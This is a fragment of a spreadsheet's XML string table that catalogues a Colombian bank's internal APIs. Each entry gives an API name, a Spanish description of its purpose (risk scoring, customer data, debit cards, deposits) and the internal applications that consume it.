    <t>El API de se encargará de calcular el score (calificación) de comportamiento de un cliente, lo cual se determina por medio de un nivel de riesgo, teniendo como dominio de valores G8 siendo está la calificación más alta de riesgo, dando a entender que esto implica un riesgo para el banco, hasta G1 siendo la calificación más baja, dando a entender que esto implica un riesgo bajo para el banco.  La G de comportamiento en conjunto con otros conceptos entregan un riesgo consolidado para dar una decisión de aprobado o no en los productos del grupo Bancolombia que el cliente este solicitando.</t>
  </si>
  <si>
    <t>PEP_AW1281002</t>
  </si>
  <si>
    <t>El API Customer Behavioral Models - Behavior V2.0.0 se encargará de calcular el score (calificación) de comportamiento de un cliente, lo cual se determina por medio de un nivel de riesgo, teniendo como dominio de valores G8 siendo este la calificación más alta de riesgo, dando a entender que esto implica un riesgo para el banco, hasta G1 siendo la calificación más baja, dando a entender que esto implica un riesgo bajo para el banco. La G de comportamiento en conjunto con otros conceptos entregan un riesgo consolidado para dar una decisión de aprobado o no en los productos del grupo Bancolombia que el cliente este solicitando</t>
  </si>
  <si>
    <t>CentralesPrecalculadas_NU0032001 _x000D_
 BIZAGIBEG_AW1176001 _x000D_
 PORTALCOBRANZA_AW1294001 _x000D_
 PricingBusiness_NU0091001 _x000D_
 PricingBusiness_NU0091001</t>
  </si>
  <si>
    <t>Customer Behavioral Models - Indebtedness</t>
  </si>
  <si>
    <t>customer-behavioral-models-indebtedness</t>
  </si>
  <si>
    <t>El API Customer Behavioral Models - Indebtedness V1.0 podrá exponer el resumen del endeudamiento de los clientes con productos Bancolombia, en los cuales se evidencia el detalle a nivel de modalidad y las cuotas que tienen en calidad de titular, cotitular o como deuda indirecta de un grupo de riesgo</t>
  </si>
  <si>
    <t>Customer Behavioral Models - Payment Capacity</t>
  </si>
  <si>
    <t>customer-behavioral-models-payment-capacity</t>
  </si>
  <si>
    <t>El API Customer Behavioral Models - Payment Capacity V1.0.0 se encarga de exponer la información de Capacidad de Pago del cliente persona natural, la cual contiene tanto los ingresos como los egresos estimados del cliente por los diferentes modelos de riesgos, para que sea consumida por cualquier área del banco que necesite esta información para apoyar los procesos internos</t>
  </si>
  <si>
    <t>Customer Behavioral Models - Payment Obligations</t>
  </si>
  <si>
    <t>customer-behavioral-models-payment-obligations</t>
  </si>
  <si>
    <t>El API brindará la capacidad de consultar el vector de mora, es decir, el comportamiento de pago de un cliente en un periodo de 6 meses, para consultar la cantidad máxima de dí­as en mora en una obligación, lo anterior para validar si es posible realizar una modificación, reestructuracion o mantenimiento sobre la obligación. Una modificación es cualquier cambio que el banco le quiere ofrecer al cliente sobre una o varias obligaciones en cualquier momento, para poder realizar una modificación a una obligación, es necesario cumplir con ciertos requisitos, no tener mora superior a 30 dí­as en los íºltimos 6 meses (maxArrear), es importante no tener ningíºn tipo de marca 026, de tipo reestructuración anterior en la obligación (Brand). Una reestructuracion es una modificación sobre una obligación cuando el cliente tuvo algíºn incumplimiento en sus pagos, las reestructuraciones tienen ciertas restricciones de tiempos y reglas impuestas por el banco para poder ser aplicadas al cliente. Un mantenimiento es realizarle una modificación a alguna de las condiciones generales de la obligación, ejemplo la tasa, el plazo o la amortización, esta modificación se le puede ofrecer al cliente cuando hay un comportamiento recurrente y el banco identifica una mejora en el pago con esta modificación. Una obligación castigada no es objeto de mantenimiento ni de modificación.</t>
  </si>
  <si>
    <t>David Esteban Lugo Posada</t>
  </si>
  <si>
    <t>Customer Case Selfmanagement</t>
  </si>
  <si>
    <t>Customer Case Selfmanagement - Cases</t>
  </si>
  <si>
    <t>customer-case-selfmanagement-cases</t>
  </si>
  <si>
    <t>permite a los consumidores realizar la consulta sobre los casos generados por el proceso de autogestión reportados por parte de un cliente. Esta consulta podrá realizarse a partir de la identificación del cliente y un rango de fechas, por lo que devolverá 0 o muchos registros de acuerdo a los filtros ingresados.</t>
  </si>
  <si>
    <t>MascaraTransaccional_NU0021001</t>
  </si>
  <si>
    <t>Customer Case</t>
  </si>
  <si>
    <t>Customer Case-PQRS</t>
  </si>
  <si>
    <t>customer-case-pqrs</t>
  </si>
  <si>
    <t>Por medio de este servicio web se gestionarán las solicitudes de un Cliente en lí­nea, desde radicar una solicitud en SAP-CRM, Consultar sus solicitudes, reasignar responsables de solucionar el requerimiento del cliente, hasta cerrar la Solicitud una vez se ha dado la solución al objeto de reclamo por el cliente.</t>
  </si>
  <si>
    <t>No aplica</t>
  </si>
  <si>
    <t>ADA_NU0150001</t>
  </si>
  <si>
    <t>Customer Commercial Data</t>
  </si>
  <si>
    <t>Customer Commercial Data - Management</t>
  </si>
  <si>
    <t>customer-commercial-data-management</t>
  </si>
  <si>
    <t>Permite realizar la consulta de la gestión comercial del cliente Colombia, tanto para persona jurí­dica, como para persona natural</t>
  </si>
  <si>
    <t>ConsultaGestionComercialCliente/V1.0</t>
  </si>
  <si>
    <t>Thanos_AW1326001 _x000D_
 LimitsCreditExhibition_NU0114001 _x000D_
 LoansOffer_NU0102001 _x000D_
 MsUtilities_NU0102001 _x000D_
 HabitatCore_AW1281003 _x000D_
 VisorInteractivo_AW1249001 _x000D_
 VisorInteractivo_AW1249001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 RIGO_NU0135001 _x000D_
 AppSarlaft_AW1176001 _x000D_
 GestionVendor_AW0661003 _x000D_
 salesforceAdapter_NU0254001 _x000D_
 VINCUTRANS_NU0034001 _x000D_
 EASYHOME_NU0004001</t>
  </si>
  <si>
    <t>Customer Contact</t>
  </si>
  <si>
    <t>Customer Contact - Contact Information</t>
  </si>
  <si>
    <t>customer-contact-contact-information</t>
  </si>
  <si>
    <t>Permite realizar la consulta de información para contactar al cliente Colombia, persona jurí­dica o persona natural, los datos de contacto son, por ejemplo: dirección de residencia, dirección de oficina, teléfono fijo, teléfono móvil, email, entre otros.</t>
  </si>
  <si>
    <t>SEG_NU0064001 _x000D_
 TRACKINGSIM_NU0098001 _x000D_
 NETWORKING_NU0046001 _x000D_
 JornadaDepositos_NU0104001 _x000D_
 Networking_NU0046001 _x000D_
 DELFINWEB_AW0748001 _x000D_
 Decision-Manager_NU0010001 _x000D_
 Thanos_AW1326001 _x000D_
 EASYHOME_NU0004001 _x000D_
 ContactInfoMDM_AW0660001 _x000D_
 AdaptadorMarketplace_NU0143001 _x000D_
 aprobaciones_AW0360007 _x000D_
 JornadaDepositos_NU0170001 _x000D_
 Portal Contenidos Bancolombia_AW1218001 _x000D_
 LoansOffer_NU0102001 _x000D_
 MsUtilities_NU0102001 _x000D_
 AdquirenciaCargaMasiva_NU0142001 _x000D_
 PSE-Pagos-Seguros-en-linea_NU0152001 _x000D_
 AccountOpening_AW1480001 _x000D_
 Kioscos_AW1272001 _x000D_
 GestionVendor_AW0661003 _x000D_
 PricingBusiness_NU0091001 _x000D_
 TRACKING_NU0098001 _x000D_
 EASYHOME_NU0004001 _x000D_
 salesforceAdapter_NU0254001</t>
  </si>
  <si>
    <t>Customer Data</t>
  </si>
  <si>
    <t>Customer Data - Keys</t>
  </si>
  <si>
    <t>customer-data-keys</t>
  </si>
  <si>
    <t>Permite consultar una llave de identificación especifica del cliente segíºn una identificación de entrada.</t>
  </si>
  <si>
    <t>ConsultaLlaveroCliente/V1.0</t>
  </si>
  <si>
    <t>creditlens_NU0038001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 Portal Contenidos Bancolombia_AW1218001 _x000D_
 LoansOffer_NU0102001 _x000D_
 GestionVendor_AW0661003 _x000D_
 salesforceAdapter_NU0254001</t>
  </si>
  <si>
    <t>Customer Data - Management</t>
  </si>
  <si>
    <t>customer-data-management</t>
  </si>
  <si>
    <t>Permite la creación y modificación de la información del cliente directamente en el maestro de clientes del banco (MDM).</t>
  </si>
  <si>
    <t>GestionCliente/V1.0</t>
  </si>
  <si>
    <t>Customer Data - Supplementary Information</t>
  </si>
  <si>
    <t>customer-data-supplementary-information</t>
  </si>
  <si>
    <t>Permite realizar la consulta de los datos personales del cliente Colombia, tanto para persona jurí­dica como para persona natural.</t>
  </si>
  <si>
    <t>ConsultaDatosComplementariosCliente/V1.0</t>
  </si>
  <si>
    <t>Customer Digital Identity</t>
  </si>
  <si>
    <t>Customer Digital Identity - Information</t>
  </si>
  <si>
    <t>customer-digital-information</t>
  </si>
  <si>
    <t>Esta API permite conocer si la identidad digital de un usuario se encuentra registrada y activa.</t>
  </si>
  <si>
    <t>VDSORQUESTADORAUTOGESTIONBACK_NU0037002 _x000D_
 GestionVendor_AW0661003 _x000D_
 Portal Contenidos Bancolombia_AW1218001 _x000D_
 TestApplication_AW1333002</t>
  </si>
  <si>
    <t>Customer Digital Identity - Management</t>
  </si>
  <si>
    <t>customer-digital-identity-management</t>
  </si>
  <si>
    <t>Esta API permite crear una transacción asociada a un tipo de trámite, a través de la cual se pueden realizar vinculaciones y autenticaciones de usuarios, así­ como obtener acceso a la información del usuario, previa autorización del mismo. Los tramites correponden a, trámite de registro, trámite de verificación de identidad</t>
  </si>
  <si>
    <t>Customer Digital Identity - Transaction Information</t>
  </si>
  <si>
    <t>customer-digital-identity-transaction-information</t>
  </si>
  <si>
    <t>Esta API permite la consulta de información sobre el estado de la transacción, así­ como los datos que ha compartido el usuario, segíºn el tipo de trámite. Los tramites correponden a, trámite de registro, trámite de verificación de identidad</t>
  </si>
  <si>
    <t>Customer Financial Data</t>
  </si>
  <si>
    <t>Customer Financial Data - Financial Information</t>
  </si>
  <si>
    <t>customer-financial-data-financial-information</t>
  </si>
  <si>
    <t>Permite realizar la consulta de la información financiera de los clientes, tal como: Ingresos, Egresos, Pasivos, Activos, entre otros.</t>
  </si>
  <si>
    <t>ConsultaDatosFinancierosCliente/V1.0</t>
  </si>
  <si>
    <t>DELFINWEB_AW0748001 _x000D_
 GestionVendor_AW0661003 _x000D_
 salesforceAdapter_NU0254001</t>
  </si>
  <si>
    <t>Customer Financial Data - Tax Information</t>
  </si>
  <si>
    <t>customer-financial-data-tax-information</t>
  </si>
  <si>
    <t>Permite consultar la información tributaria del cliente, estos datos corresponden a la información de impuestos, retención, entre otros.</t>
  </si>
  <si>
    <t>ConsultaDatosTributariosCliente/V1.0</t>
  </si>
  <si>
    <t>Customer Information</t>
  </si>
  <si>
    <t>Customer Information - Keys</t>
  </si>
  <si>
    <t>customer-information-keys</t>
  </si>
  <si>
    <t>API que permite consultar una llave de identificación especifica del cliente segíºn una identificación de entrada.</t>
  </si>
  <si>
    <t>Customer Information Management</t>
  </si>
  <si>
    <t>Customer Information Management - Management</t>
  </si>
  <si>
    <t>customer-information-management-management</t>
  </si>
  <si>
    <t>salesforceAdapter_NU0254001</t>
  </si>
  <si>
    <t>Customer Management</t>
  </si>
  <si>
    <t>Customer Management - Amount Limit Management</t>
  </si>
  <si>
    <t>customer-management-amount-limit-management</t>
  </si>
  <si>
    <t>Esta API permite gestionar los topes que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el dí­a o mes segíºn sea el caso. Para esto, el servicio permitirá consultar el monto lí­mite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco y permitirá tener un acumulado de las transacciones hechas por el cliente durante el dí­a para poder determinar hasta qué momento puede debitarse de sus cuentas.</t>
  </si>
  <si>
    <t>GestionDeTopesMontosClientes/V1.0</t>
  </si>
  <si>
    <t>Recargas_AW1300001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 Thanos_AW1326001</t>
  </si>
  <si>
    <t>Customer Personal Data</t>
  </si>
  <si>
    <t>Customer Personal Data - Information</t>
  </si>
  <si>
    <t>customer-personal-data-information</t>
  </si>
  <si>
    <t>ConsultaDatosPersonalesCliente/V1.0</t>
  </si>
  <si>
    <t>ALM_AW0955001 _x000D_
 ALM_AW0955 _x000D_
 CGC_NU0014001 _x000D_
 SEG_NU0064001 _x000D_
 NETWORKING_NU0046001 _x000D_
 JornadaDepositos_NU0104001 _x000D_
 Networking_NU0046001 _x000D_
 TMP_AW0955 _x000D_
 VINCUTRANS_NU0034001 _x000D_
 Thanos_AW1326001 _x000D_
 SucursalVirtualValores_AW0638 _x000D_
 AdaptadorMarketplace_NU0143001 _x000D_
 JornadaDepositos_NU0170001 _x000D_
 LoansOffer_NU0102001 _x000D_
 MsUtilities_NU0102001 _x000D_
 AdquirenciaCargaMasiva_NU0142001 _x000D_
 APP-PERSONAS_NU0146001 _x000D_
 SVPSucursalVirtualPersonas_NU0149001 _x000D_
 PSE-Pagos-Seguros-en-linea_NU0152001 _x000D_
 AccountOpening_AW1480001 _x000D_
 RIGO_NU0135001 _x000D_
 BancolombiaPay_AW1435001 _x000D_
 GestionVendor_AW0661003 _x000D_
 PricingBusiness_NU0091001 _x000D_
 salesforceAdapter_NU0254001 _x000D_
 Galatea_NU0051001</t>
  </si>
  <si>
    <t>Customer Personal Summary Data</t>
  </si>
  <si>
    <t>Customer Personal Summary Data - Information</t>
  </si>
  <si>
    <t>customer-personal-summary-data-information</t>
  </si>
  <si>
    <t>LoansOffer_NU0102001</t>
  </si>
  <si>
    <t>Customer Portfolio</t>
  </si>
  <si>
    <t>Customer Portfolio - External Sources</t>
  </si>
  <si>
    <t>customer-portfolio-external-sources</t>
  </si>
  <si>
    <t>Permite consultar información de diferentes fuentes píºblicas desde aplicaciones  que requieran acceder a este tipo de información. Ej: BDUA, RUES, RUNT, RUAF, PROCURADURí?A, SISBEN, DIAN, entre otras.</t>
  </si>
  <si>
    <t>ConsultaFuentesPublicasExternas/V1.0</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>GestionaNegocios_AW1302001 _x000D_
 EDPYME_AW1170 _x000D_
 APM_AW1081001 _x000D_
 AdquirenciaCargaMasiva_NU0142001 _x000D_
 VINCUTRANS_NU0034001</t>
  </si>
  <si>
    <t>Customer Product Eligibility</t>
  </si>
  <si>
    <t>Customer Product Elegibility - Habitat</t>
  </si>
  <si>
    <t>customer-product-elegibility-habitat</t>
  </si>
  <si>
    <t>Esta API permite consultar la recomendación de diversos productos a los clientes basado en la analí­tica de su comportamiento y perfilamiento financiero. El origen de esta analí­tica de perfilamiento de productos es dictaminado por los datos con los que cuenta el banco de cada uno de sus clientes, analizando así­ que tipo de productos son los más cercanos a su realidad personal y financiera. Aquí­ podemos encontrar la operación que permite la recomendación de productos de vivienda.</t>
  </si>
  <si>
    <t>Ecosistemas</t>
  </si>
  <si>
    <t>MarketplaceEcosistemasPersonas_NU0035001</t>
  </si>
  <si>
    <t>Customer Product Elegibility - Vehicles</t>
  </si>
  <si>
    <t>customer-product-eligibility-vehicles</t>
  </si>
  <si>
    <t>Esta API permite consultar la recomendación de diversos productos a los clientes basado en la analí­tica de su comportamiento y perfilamiento financiero. El origen de esta analí­tica de perfilamiento de productos es dictaminado por los datos con los que cuenta el banco de cada uno de sus clientes, analizando así­ que tipo de productos son los más cercanos a su realidad personal y financiera. Aquí­ podemos encontrar la operación que permite la recomendación de productos de vehiculo.</t>
  </si>
  <si>
    <t>Customer Product Service Eligibility</t>
  </si>
  <si>
    <t>Customer Product/Service Elegibility  Vehicles</t>
  </si>
  <si>
    <t>customer-product-service-eligibility</t>
  </si>
  <si>
    <t>Proveedor de OAuth que cambia Id de sesión por un Token de acceso para canales virtuales</t>
  </si>
  <si>
    <t>MarketplaceEcosistemasPersonas_NU0035001 _x000D_
 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Customer Products</t>
  </si>
  <si>
    <t>Customer Products Natural Person</t>
  </si>
  <si>
    <t>customer-products-natural-person</t>
  </si>
  <si>
    <t>La Api ofrece a los consumidores, la capacidad de obtener la información de los productos que posee un cliente en el banco.</t>
  </si>
  <si>
    <t>Customer Products Relationship Management</t>
  </si>
  <si>
    <t>customer-products-relationship-management</t>
  </si>
  <si>
    <t>A través de esta API se puede administrar la Relación Cliente-Producto, permitiendo crear, editar o eliminar registros.</t>
  </si>
  <si>
    <t>Customer Profile Information</t>
  </si>
  <si>
    <t>Customer Profile Information - Private External Sources</t>
  </si>
  <si>
    <t>customer-profile-information-private-external-sources</t>
  </si>
  <si>
    <t>El API permite obtener una  información detallada de una persona natural o jurí­dica, este detalle da a conocer la localización geográfica, validación de direcciones, teléfonos, celulares, correos electrónicos, los datos de contacto, parámetros de usuarios y productos relacionados a esta persona, dependiendo de su tipo y numero de documento y el primer apellido.</t>
  </si>
  <si>
    <t>VINCUTRANS_NU0034001 _x000D_
 APP_AW1318001</t>
  </si>
  <si>
    <t>Customer Profile Product</t>
  </si>
  <si>
    <t>Customer Profile Product - Information</t>
  </si>
  <si>
    <t>customer-profile-product-information</t>
  </si>
  <si>
    <t xml:space="preserve">Esta API permite identificar informacion sobre un cliente con base en la informacion de expirian </t>
  </si>
  <si>
    <t>CPPALM_AW1086001 _x000D_
 RespuestaAlFrente_AW1086001 _x000D_
 ConsultaInformacionBuroCredito_AW0955001</t>
  </si>
  <si>
    <t>Customer Reference Data Mgmt</t>
  </si>
  <si>
    <t>Customer Reference Data Mgmt - Bank Statements</t>
  </si>
  <si>
    <t>customer-reference-data-bank-statements</t>
  </si>
  <si>
    <t>El API permite obtener los periodos disponibles para consulta y los extractos, de los productos de un cliente. El extracto se genera en formato Base64, para que el consumidor pueda posteriormente decodificarlo a un formato como PDF.</t>
  </si>
  <si>
    <t>ConsultaExtractosCliente/V1.0</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 Portal Contenidos Bancolombia_AW1218001 _x000D_
 Thanos_AW1326001</t>
  </si>
  <si>
    <t>Customer Relationships Data</t>
  </si>
  <si>
    <t>Customer Relationships Data - Information</t>
  </si>
  <si>
    <t>customer-relationships-data-information</t>
  </si>
  <si>
    <t>Permite consultar la información de las relaciones o ví­nculos del cliente, por ejemplo: Referencia comercial, referencia personal, referencia familiar, abogado, ejecutivo de portafolio, entre otros.</t>
  </si>
  <si>
    <t>ConsultaDatosRelacionesCliente/V1.0</t>
  </si>
  <si>
    <t>AdquirenciaCargaMasiva_NU0142001 _x000D_
 NETWORKING_NU0046001 _x000D_
 AppSarlaft_AW1176001 _x000D_
 GestionVendor_AW0661003 _x000D_
 PricingBusiness_NU0091001 _x000D_
 salesforceAdapter_NU0254001</t>
  </si>
  <si>
    <t>Customer Tracking</t>
  </si>
  <si>
    <t>Customer Request Tracking</t>
  </si>
  <si>
    <t>customer-request-tracking</t>
  </si>
  <si>
    <t>La Api ofrece a los consumidores, la capacidad de registrar las novedades de los servicios que tiene como cliente.</t>
  </si>
  <si>
    <t>SAPCRM_AW0611001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Portal Contenidos Bancolombia_AW1218001 _x000D_
 TRACKINGSIM_NU0098001 _x000D_
 SAPCRM_AW0611001 _x000D_
 TRACKING_NU0098001</t>
  </si>
  <si>
    <t>Customer Risk</t>
  </si>
  <si>
    <t>Customer Risk - Group</t>
  </si>
  <si>
    <t>customer-risk-group</t>
  </si>
  <si>
    <t>Esta API permite exponer el grupo de riesgo al que pertenece un cliente y el detalle de los integrantes que conforman dicho grupo. Un grupo de riesgo es un conjunto de personas naturales y/o jurí­dicas que se relacionan entre sí­; por ví­nculos de capital y subordinación, administrativos, de negocio, familiares, entre otras; que implican un riesgo en comíºn entre las partes. Para consolidar los grupos de riesgos se tiene en cuenta los motivos de conformación que se establecen en el titulo 2 y 3 del Decreto 2555 regulado por la Superintendencia Financiera de Colombia (Lí­mites individuales de crédito y concentración de riesgo). Los grupos están clasificados por: '¢	Legales: Son los que cumplen los motivos legales del Decreto, es decir, que son soportados. '¢	Internos: Estos son grupos administrativos que no necesariamente cumplen el motivo legal, pero que internamente se identifica un riesgo comíºn desde el conocimiento del cliente.</t>
  </si>
  <si>
    <t>ConsultaGruposDeRiesgo/V1.0</t>
  </si>
  <si>
    <t>PORTALCOBRANZA_AW1294001 _x000D_
 DELFINWEB_AW0748001 _x000D_
 VINCUTRANS_NU0034001 _x000D_
 GruposDeRiesgo_AW1294001 _x000D_
 HabitatCore_AW1281003</t>
  </si>
  <si>
    <t>Tec-Customer Risk</t>
  </si>
  <si>
    <t>CentralesPrecalculadas_NU0032001 _x000D_
 GruposDeRiesgo_AW1294001 _x000D_
 PORTALCOBRANZA_AW1294001</t>
  </si>
  <si>
    <t>Customer Risk Behavior</t>
  </si>
  <si>
    <t>Customer Risk Behavior - Assessment</t>
  </si>
  <si>
    <t>customer-risk-behavior-assessment</t>
  </si>
  <si>
    <t>El API Customer Risk Behavior - Assessment V1.0.1 se encarga de consultar las centrales Internas del cliente, recuperando la calificación obtenida segíºn el endeudamiento que presente el mismo, al momento de la consulta</t>
  </si>
  <si>
    <t>CentralesPrecalculadas_NU0032001 _x000D_
 EASYHOME_NU0004001</t>
  </si>
  <si>
    <t>CentralesPrecalculadas_NU0032001 _x000D_
 BIZAGIBEG_AW1176001 _x000D_
 EASYHOME_NU0004001 _x000D_
 EASYHOME_NU0004001</t>
  </si>
  <si>
    <t>Customer Risk Behavior - Credit Registries</t>
  </si>
  <si>
    <t>customer-risk-behavior-credit-registries</t>
  </si>
  <si>
    <t>El API Customer Risk Behavior - Credit Registries V1.0.0 se encarga de consultar las centrales externas del cliente, recuperando la calificación obtenida segíºn el endeudamiento que presente el mismo en entidades diferentes al grupo Bancolombia, al momento de la consulta</t>
  </si>
  <si>
    <t>Customer Risk Validate Identity</t>
  </si>
  <si>
    <t>tec-customer-risk-validate-identity</t>
  </si>
  <si>
    <t>API permite validar la identidad de una persona natural, mediante la generación de preguntas sobre su información demográfica y crediticia entre otras.</t>
  </si>
  <si>
    <t>ConfirmarIdentidadPersonaEnDataCredito/V2.0</t>
  </si>
  <si>
    <t>Customer Security</t>
  </si>
  <si>
    <t>Customer Security - Alias</t>
  </si>
  <si>
    <t>customer-security-alias</t>
  </si>
  <si>
    <t>Esta API en la Gestión del Alias ofrece la capacidad de registrar y modificar el alias, el cual hace referencia a la identidad que está accediendo a un servicio.  Un alias que se registre es utilizado íºnica y exclusivamente por un usuario, independiente del canal, por tanto, el primero que registre un alias lo reserva en todos los canales. Un usuario puede tener míºltiples alias, por canal. Así­ mismo, en la Consulta del Alias ofrece la capacidad de recolectar la información propia de un alias o de todos los alias, asociados a una identidad, así­ mismo de la información de esta.</t>
  </si>
  <si>
    <t>FUA_AW1291001</t>
  </si>
  <si>
    <t>Esta API en la Gestión del Alias ofrece la capacidad de registrar y modificar el alias, el cual hace referencia a la identidad que está accediendo a un servicio.  Un alias que se registre es utilizado íºnica y exclusivamente por un usuario, independiente del canal, por tanto, el primero que registre un alias lo reserva en todos los canales. Un usuario puede tener míºltiples alias, por canal.</t>
  </si>
  <si>
    <t>ALM_AW0955001 _x000D_
 ALM_AW0955 _x000D_
 NETWORKING_NU0046001 _x000D_
 HabitatAdministraciones_NU0113001 _x000D_
 PEP_AW1281002 _x000D_
 APP-PERSONAS_NU0146001 _x000D_
 SVPSucursalVirtualPersonas_NU0149001 _x000D_
 PSE-Pagos-Seguros-en-linea_NU0152001</t>
  </si>
  <si>
    <t>BancolombiaPay_AW1435001 _x000D_
 NU0046001_NETWORKING_MR _x000D_
 APP-PERSONAS_NU0146001 _x000D_
 PEP_AW1281002 _x000D_
 Galatea_NU0051001</t>
  </si>
  <si>
    <t>Customer Security - Identity</t>
  </si>
  <si>
    <t>customer-security-identity</t>
  </si>
  <si>
    <t>Esta API en la Gestión de la Identidad ofrece la capacidad de registrar y modificar la identidad como íºnica dentro de los canales del banco, es decir, registrar y modificar las caracterí­sticas de una persona que permiten distinguirla de otras en un conjunto. Así­ mismo, en la Consulta de la Identidad ofrece la capacidad de recolectar la información propia de la identidad.</t>
  </si>
  <si>
    <t>Customer Data Sufi</t>
  </si>
  <si>
    <t>Customers</t>
  </si>
  <si>
    <t>customers</t>
  </si>
  <si>
    <t>API para consulta de datos generales Sufi</t>
  </si>
  <si>
    <t>adaptadorSufi_NU0204001</t>
  </si>
  <si>
    <t>Customers Case Management</t>
  </si>
  <si>
    <t>Customers Case Management-Customers Case</t>
  </si>
  <si>
    <t>customers-case-management-customers-case</t>
  </si>
  <si>
    <t>Permite la Administración de la creación de solicitudes de un Cliente</t>
  </si>
  <si>
    <t>CustomerValidation</t>
  </si>
  <si>
    <t>Customer-Validation-ControlList</t>
  </si>
  <si>
    <t>customer-validation-control-list</t>
  </si>
  <si>
    <t>MUVERANG_NU0063001 _x000D_
 MonitoreoDCM_AAA</t>
  </si>
  <si>
    <t>Debit Card</t>
  </si>
  <si>
    <t>Debit Card - Administration</t>
  </si>
  <si>
    <t>debit-card-administration</t>
  </si>
  <si>
    <t>Esta API permite exponer las diferentes de gestión relativas a productos débito. Incluye capacidades de novedades y validaciones que se describen brevemente a continuación: - Validar titularidad  - Asociar medio de pago a cuenta  - Bloquear tarjeta  - Desbloquear tarjeta.</t>
  </si>
  <si>
    <t>NovedadesTarjetasDebito/V1.0</t>
  </si>
  <si>
    <t>ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000D_
 Autenticacion-para-VCAS_NU0101001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 JornadaDepositos_NU0104001 _x000D_
 Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000D_
 JornadaDepositos_NU0170001 _x000D_
 GESTION DE PRECIOS_NU0091001 _x000D_
 RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000D_
 MascaraTransaccional_NU0021001</t>
  </si>
  <si>
    <t>Debit Card - Debit Cards</t>
  </si>
  <si>
    <t>debit-card-debit-cards</t>
  </si>
  <si>
    <t>Este servicio permite realizar diferentes tipos de consultas asociadas a las tarjetas débito.   - Listar las tarjetas activas de un cliente - Listar las tarjetas pendientes por activar - Listar las tarjetas canceladas - Consultar codigo de seguridad</t>
  </si>
  <si>
    <t>Debit Card - Information</t>
  </si>
  <si>
    <t>debit-card-information</t>
  </si>
  <si>
    <t>permite realizar diferentes tipos de consultas asociadas a las tarjetas débito.</t>
  </si>
  <si>
    <t>Debit Card - Management</t>
  </si>
  <si>
    <t>debit-card-management</t>
  </si>
  <si>
    <t>Esta API permite exponer las diferentes capacidades de gestión relativas a tarjetas de débito. Incluye capacidades de novedades y validacionees.</t>
  </si>
  <si>
    <t>GestionTarjetasCredito/V2.0
GestionTarjetasDebito/V2.0</t>
  </si>
  <si>
    <t>Debit Card Cost</t>
  </si>
  <si>
    <t>debit-card-cost</t>
  </si>
  <si>
    <t>La Api Debit Card Cost - permite llevar a cabo las siguientes funcionalidades.   - API que permite consultar los costos de la couta de manejo de una tarjeta débito.</t>
  </si>
  <si>
    <t>Debit Card Design</t>
  </si>
  <si>
    <t>Debit Card Design - Fares</t>
  </si>
  <si>
    <t>debit-card-design-fares</t>
  </si>
  <si>
    <t>Esta api cuenta con la capacidad de exponer datos de consulta relacionados con la cuota de manejo y tarifas asociadas a la Tarjeta débito</t>
  </si>
  <si>
    <t>ConsultaDeTarifasTarjetasDebito/V1.0</t>
  </si>
  <si>
    <t>GESTION DE PRECIOS_NU0091001 _x000D_
 ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000D_
 RCAMPODEBITCARDDESIGN_PRODUCTORCONSUMIDOR _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Debit Cards - Delivery</t>
  </si>
  <si>
    <t>debit-card-delivery</t>
  </si>
  <si>
    <t>La Api Debit Cards - Delivery - permite llevar a cabo las siguientes funcionalidades.   - Api que permite al cliente ingresar su información de contactabilidad, para que le sea entregado un medio de pago en su domicilio por medio de un operador logí­stico.</t>
  </si>
  <si>
    <t>Debit Cards</t>
  </si>
  <si>
    <t>Debit Cards - Notify</t>
  </si>
  <si>
    <t>debit-cards-notify</t>
  </si>
  <si>
    <t>Esta api permite llevar a cabo las siguientes funcionalidades: - Informe de Entrega, Permite al proveedor informar el estado final de la entrega de las tarjetas debito en el domicilio de los clientes.</t>
  </si>
  <si>
    <t>NotificacionEntregaProductoDebito/V1.0</t>
  </si>
  <si>
    <t>Domina _x000D_
 MonitoreoDCM_AAA</t>
  </si>
  <si>
    <t>Deposits</t>
  </si>
  <si>
    <t>Deposit - Account Information</t>
  </si>
  <si>
    <t>deposit-account-information</t>
  </si>
  <si>
    <t>Esta API permite realizar la consulta de la información de una cuenta de ahorro o corriente, obteniendo la información básica o detallada en filiales del exterior</t>
  </si>
  <si>
    <t>ConsultaInformacionCuentasDepositos/V1.0</t>
  </si>
  <si>
    <t>TMP EDIN APP_AW1276001 _x000D_
 BC_Herramientas_Monitoreo</t>
  </si>
  <si>
    <t>TMP EDIN APP_AW1276001 _x000D_
 App inversionesGB_AW1185001 _x000D_
 APOLO_AW0360010 _x000D_
 BC_Herramientas_Monitoreo _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Deposit - Account Transactions</t>
  </si>
  <si>
    <t>deposit-account-transactions</t>
  </si>
  <si>
    <t>Esta API permite listar la información de los movimientos de las cuentas de ahorro/corriente principal del cliente</t>
  </si>
  <si>
    <t>ConsultaInformacionCuentasDepositos/V2.0</t>
  </si>
  <si>
    <t>Deposit - Account Transfers</t>
  </si>
  <si>
    <t>deposit-account-transfers</t>
  </si>
  <si>
    <t>Permite realizar transferencias internas y externas de cuentas depósito</t>
  </si>
  <si>
    <t>TransferenciasDeFondos/V1.0</t>
  </si>
  <si>
    <t>Deposit - Fixed Information</t>
  </si>
  <si>
    <t>deposit-fixed-information</t>
  </si>
  <si>
    <t>Esta API permite consultar la informacion detallada de una cuenta de plazos fijos en filiales del exterior</t>
  </si>
  <si>
    <t>ConsultaInformacionCuentasPlazosFijos/V1.0</t>
  </si>
  <si>
    <t>Deposit - Fixed Transactions</t>
  </si>
  <si>
    <t>deposit-fixed-transactions</t>
  </si>
  <si>
